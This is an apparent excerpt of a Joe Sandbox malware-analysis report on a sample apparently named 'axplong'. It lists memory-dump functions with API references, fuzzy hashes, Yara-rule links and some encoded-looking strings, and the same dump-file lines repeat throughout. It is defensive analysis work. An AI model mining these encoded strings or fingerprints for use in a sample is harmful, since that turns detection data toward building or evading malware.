Associated: 00000006.00000002.3326585955.00000000003BE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000003EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000003F8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.0000000000406000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3327026838.0000000000407000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3327194551.00000000005A2000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f0000_axplong.jbxd

Yara matches

Similarity

API ID: Time$FilePreciseSystem
String ID:
API String ID: 1802150274-0
Opcode ID: b77c05bfbf3158f09292aa3988865d549f0d38dd75943879d804c7c74c088854
Instruction ID: 0f3f9bf32823cf23a1657d684d3d7caca668c702a710e3a5e6b95d65e5376b40
Opcode Fuzzy Hash: b77c05bfbf3158f09292aa3988865d549f0d38dd75943879d804c7c74c088854
Instruction Fuzzy Hash: 81D0223254617CD3CA022BA4AC088ACBB498B05B903048211EE04275A08FE06CC04FD0

Function 00127D83 Relevance: 1.5, Strings: 1, Instructions: 216COMMON

Download Yara Rule

Strings

0, xrefs: 00127EFF

Memory Dump Source

Source File: 00000006.00000002.3326444723.00000000000F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000006.00000002.3326416357.00000000000F0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326444723.0000000000152000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326555536.0000000000159000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.000000000015B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000002DC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000003BE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000003EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000003F8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.0000000000406000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3327026838.0000000000407000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3327194551.00000000005A2000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
Instruction ID: e46d13c662abcf8e9c73bb27295035caee9f6f5b3c705a2d3eccd94603cf1c1b
Opcode Fuzzy Hash: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
Instruction Fuzzy Hash: 9D51A73120C67C5BDB3C9A78B9967BFA79A9F22300F15049DE482D76C2DB11DD748362

Function 000F4CF0 Relevance: .7, Instructions: 701COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3326444723.00000000000F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000006.00000002.3326416357.00000000000F0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326444723.0000000000152000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326555536.0000000000159000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.000000000015B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000002DC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000003BE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000003EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000003F8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.0000000000406000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3327026838.0000000000407000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3327194551.00000000005A2000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70ca371770ff14f04501b04bb27e58e93926b09c9403d439dc813e3b680189d0
Instruction ID: 3f15dd4bfac1b335b45339df1aa9814d7199c7ced24ee8db8a67b98ba2688067
Opcode Fuzzy Hash: 70ca371770ff14f04501b04bb27e58e93926b09c9403d439dc813e3b680189d0
Instruction Fuzzy Hash: FD2260B3F516144BDB0CCB9DDCA27EDB2E3AFD8214B0E803DA40AE3745EA79D9158644

Function 00136F09 Relevance: .3, Instructions: 275COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3326444723.00000000000F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000006.00000002.3326416357.00000000000F0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326444723.0000000000152000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326555536.0000000000159000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.000000000015B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000002DC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000003BE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000003EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000003F8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.0000000000406000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3327026838.0000000000407000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3327194551.00000000005A2000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 263215736b111b8bc2f66f5f2dfa6d1a2da608e5957b0c2b3e47ba3f22cd8924
Instruction ID: 3a7770eb8eca388cc3e81f04aeb760210afe62d16d8fbb940f0933932c14796c
Opcode Fuzzy Hash: 263215736b111b8bc2f66f5f2dfa6d1a2da608e5957b0c2b3e47ba3f22cd8924
Instruction Fuzzy Hash: 42B14A72214609DFD729CF28C496B657BA0FF45364F258658F899CF2E1C335E982CB40

Function 0010D312 Relevance: .2, Instructions: 172COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 000F247E

Memory Dump Source

Source File: 00000006.00000002.3326444723.00000000000F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000006.00000002.3326416357.00000000000F0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326444723.0000000000152000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326555536.0000000000159000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.000000000015B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000002DC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000003BE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000003EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000003F8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.0000000000406000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3327026838.0000000000407000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3327194551.00000000005A2000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f0000_axplong.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID:
API String ID: 2659868963-0
Opcode ID: ee5b2c19c10f8c4594feb7f6e5d333afff1c25b495ae61082046d7f5d0f53947
Instruction ID: 48aa4d2517d9ab79d830f697be08ce692aa0c02cf6d157219b639c9317208d10
Opcode Fuzzy Hash: ee5b2c19c10f8c4594feb7f6e5d333afff1c25b495ae61082046d7f5d0f53947
Instruction Fuzzy Hash: 2A518BB2A00705CFDB19CF98E8917AAB7F5FB18311F24856AE845EB6D0D7B49980CF50

Function 000F4AF0 Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3326444723.00000000000F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000006.00000002.3326416357.00000000000F0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326444723.0000000000152000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326555536.0000000000159000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.000000000015B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000002DC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000003BE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000003EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000003F8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.0000000000406000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3327026838.0000000000407000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3327194551.00000000005A2000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6235660b7107da7c3aecfb2c783c748043af7ad409f96bfb1f0640db26b85ac5
Instruction ID: 69132c07e22d8a154211cc4c80de6461e385dc823f288fc9b4c5d427749995c4
Opcode Fuzzy Hash: 6235660b7107da7c3aecfb2c783c748043af7ad409f96bfb1f0640db26b85ac5
Instruction Fuzzy Hash: 4D51C07160C3918FC319CF2D851523ABFE1AFD6200F084A9EE5D687292D774DA48DBE2

Function 0013777B Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3326444723.00000000000F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000006.00000002.3326416357.00000000000F0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326444723.0000000000152000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326555536.0000000000159000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.000000000015B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000002DC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000003BE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000003EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000003F8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.0000000000406000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3327026838.0000000000407000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3327194551.00000000005A2000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 365826f42068e73f87ecd65727342e032bdf392f7f5a8f3656f2dca2b219142a
Instruction ID: 6b36ed696a6573639e6d8e025b425b93cf315780508e8a5bd038bb9ddf8351a5
Opcode Fuzzy Hash: 365826f42068e73f87ecd65727342e032bdf392f7f5a8f3656f2dca2b219142a
Instruction Fuzzy Hash: 9521B673F205394B770CC47E8C5727DB6E1C78C541745423AE8A6EA2C1D968D917E2E4

Function 0013765B Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3326444723.00000000000F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000006.00000002.3326416357.00000000000F0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326444723.0000000000152000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326555536.0000000000159000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.000000000015B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000002DC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000003BE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000003EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000003F8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.0000000000406000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3327026838.0000000000407000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3327194551.00000000005A2000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b77c30c417bbe493654686898e3dc099cd398a5e806bcb531a7e11e570ee1dbd
Instruction ID: 73d8fd4124eef0b1e518fcdb85513b83330d19eb34e3896003a7ee12cdddf4b6
Opcode Fuzzy Hash: b77c30c417bbe493654686898e3dc099cd398a5e806bcb531a7e11e570ee1dbd
Instruction Fuzzy Hash: 4B117363F30C255A775C816D8C172BAA5D2EBD825071F533AD826EB2C4E9A4DE23D290

Function 00138720 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3326444723.00000000000F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000006.00000002.3326416357.00000000000F0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326444723.0000000000152000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326555536.0000000000159000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.000000000015B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000002DC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000003BE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000003EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000003F8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.0000000000406000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3327026838.0000000000407000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3327194551.00000000005A2000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: f159384cfb8e1fb96b9d6dc857c53dc1f49fbe37b5899d2b9fb30ca3b3029cea
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 5711087B20038147D615873DC9F85B6B797EBC5321F3D437AF1414B758DB229945D900

Function 0012645B Relevance: .0, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3326444723.00000000000F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000006.00000002.3326416357.00000000000F0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326444723.0000000000152000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326555536.0000000000159000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.000000000015B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000002DC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000003BE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000003EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000003F8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.0000000000406000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3327026838.0000000000407000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3327194551.00000000005A2000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07ec3dee0d5b5a4071920f87bfe2e5a8960e205b5467203a40e9d9c6e7131cd9
Instruction ID: 79b3138be502b664ba4dd636f7df6a37b4d9fd793278a373236362b62a6b3d45
Opcode Fuzzy Hash: 07ec3dee0d5b5a4071920f87bfe2e5a8960e205b5467203a40e9d9c6e7131cd9
Instruction Fuzzy Hash: 65E08C30141698AFCE257F14E9499483B1AEF61359F004804F8088A262CB39FCA1CA81

Function 0012A1C2 Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3326444723.00000000000F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000006.00000002.3326416357.00000000000F0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326444723.0000000000152000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326555536.0000000000159000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.000000000015B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000002DC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000003BE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000003EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000003F8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.0000000000406000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3327026838.0000000000407000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3327194551.00000000005A2000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
Instruction ID: 4564a5bdb7b61421c551a5a0321358ff26977752decd6236b36f1d7b387acd1d
Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
Instruction Fuzzy Hash: CFE0B672915238EBCB15DB98AA4498AF3ECEB49B50F554496B601D3251C370DF20CBD1

Function 00102E20 Relevance: 17.9, APIs: 3, Strings: 7, Instructions: 434COMMON

Download Yara Rule

Strings

invalid stoi argument, xrefs: 0010425A
stoi argument out of range, xrefs: 00104269
8KG0fymoFx==, xrefs: 00102EC7
WGt=, xrefs: 001033BA
HBhr, xrefs: 0010378F
246122658369, xrefs: 001033D4
Fz==, xrefs: 0010369E

Memory Dump Source

Source File: 00000006.00000002.3326444723.00000000000F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000006.00000002.3326416357.00000000000F0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326444723.0000000000152000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326555536.0000000000159000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.000000000015B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000002DC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000003BE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000003EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000003F8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.0000000000406000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3327026838.0000000000407000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3327194551.00000000005A2000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID: 246122658369$8KG0fymoFx==$Fz==$HBhr$WGt=$invalid stoi argument$stoi argument out of range
API String ID: 0-2390467879
Opcode ID: 1ecdf905114bce10acb36bad943fa2a335f02616f1fb4f4685dcea74471edc33
Instruction ID: 6d8de59a95c95d61626cdab6c473107028e966a350c61b47b992dc268a274246
Opcode Fuzzy Hash: 1ecdf905114bce10acb36bad943fa2a335f02616f1fb4f4685dcea74471edc33
Instruction Fuzzy Hash: D502E170E00248DFEF14DFA8C855BEEBBB5AF15304F504158E855A72C2D7B5AA84CBA1

Function 000F2E80 Relevance: 10.8, APIs: 7, Instructions: 272threadCOMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 000F2F1F
GetCurrentThreadId.KERNEL32 ref: 000F2F3E
__Mtx_unlock.LIBCPMT ref: 000F2F8C
__Cnd_broadcast.LIBCPMT ref: 000F2FA3
__Mtx_unlock.LIBCPMT ref: 000F30B5
GetCurrentThreadId.KERNEL32 ref: 000F30F2
__Mtx_unlock.LIBCPMT ref: 000F315B

Memory Dump Source

Source File: 00000006.00000002.3326444723.00000000000F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000006.00000002.3326416357.00000000000F0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326444723.0000000000152000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326555536.0000000000159000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.000000000015B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000002DC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000003BE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000003EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000003F8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.0000000000406000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3327026838.0000000000407000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3327194551.00000000005A2000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f0000_axplong.jbxd

Yara matches

Similarity

API ID: Mtx_unlock$CurrentThread$Cnd_broadcast
String ID:
API String ID: 57040152-0
Opcode ID: c1c3a72604022ab864b2aa9cadd9e158a4102df094c8e54876701b10786e72fb
Instruction ID: 98a1685499587e8dbb0eadac92b2950f9e168e7e2fa48fadf2a79eb3fb7f0bb7
Opcode Fuzzy Hash: c1c3a72604022ab864b2aa9cadd9e158a4102df094c8e54876701b10786e72fb
Instruction Fuzzy Hash: 2BA1E170A013099FDB21DB64C945BAAB7F8FF15320F048239E915D7A81EB75EA08DBD1

Function 001270C9 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74COMMON

Download Yara Rule

APIs

_wcsrchr.LIBVCRUNTIME ref: 0012710B

Strings

.bat, xrefs: 0012713A
.cmd, xrefs: 00127129
.com, xrefs: 0012714B
.exe, xrefs: 00127118

Memory Dump Source

Source File: 00000006.00000002.3326444723.00000000000F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000006.00000002.3326416357.00000000000F0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326444723.0000000000152000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326555536.0000000000159000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.000000000015B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000002DC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000003BE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000003EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000003F8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.0000000000406000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3327026838.0000000000407000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3327194551.00000000005A2000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f0000_axplong.jbxd

Yara matches

Similarity

API ID: _wcsrchr
String ID: .bat$.cmd$.com$.exe
API String ID: 1752292252-4019086052
Opcode ID: af8da324a80c6238b28b3d8c5d34f812fd878f09ce066e9a3b14907e80f9bbe5
Instruction ID: d8d62c1341d52cbfbe3a7451e7d93eda9c2fc15e72e21319f598d4c14bbb2060
Opcode Fuzzy Hash: af8da324a80c6238b28b3d8c5d34f812fd878f09ce066e9a3b14907e80f9bbe5
Instruction Fuzzy Hash: CB01F93760C636266A186419BC0263B17989F97BB872D002BFD44F73C2EF54DCB241A0

Function 0012C9B0 Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 0012CA37

Memory Dump Source

Source File: 00000006.00000002.3326444723.00000000000F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000006.00000002.3326416357.00000000000F0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326444723.0000000000152000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326555536.0000000000159000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.000000000015B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000002DC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000003BE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000003EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.00000000003F8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3326585955.0000000000406000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3327026838.0000000000407000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3327194551.00000000005A2000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f0000_axplong.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 06cc7c729825ef3726f3ff46e89b4dfb23933aad1dd17f016a943cdb57bb7414
Instruction ID: 3148c1114eee618283d83582c8572a89b10b484082690aaa26aeb07f8fb69be0
Opcode Fuzzy Hash: 06cc7c729825ef3726f3ff46e89b4dfb23933aad1dd17f016a943cdb57bb7414
Instruction Fuzzy Hash: E4B138329002A59FDB15CF28D8417FEBBE5EF55340F14816AEA45AB341E7349D61CBE0

Function 0010BAA2 Relevance: 6.1, APIs: 4, Instructions: 80COMMON

Download Yara Rule

APIs

_xtime_get.LIBCPMT ref: 0010BAFA
__Xtime_diff_to_millis2.LIBCPMT ref: 0010BB14
_xtime_get.LIBCPMT ref: 0010BB37
__Xtime_diff_to_millis2.LIBCPMT ref: 0010BB43

Memory Dump Source

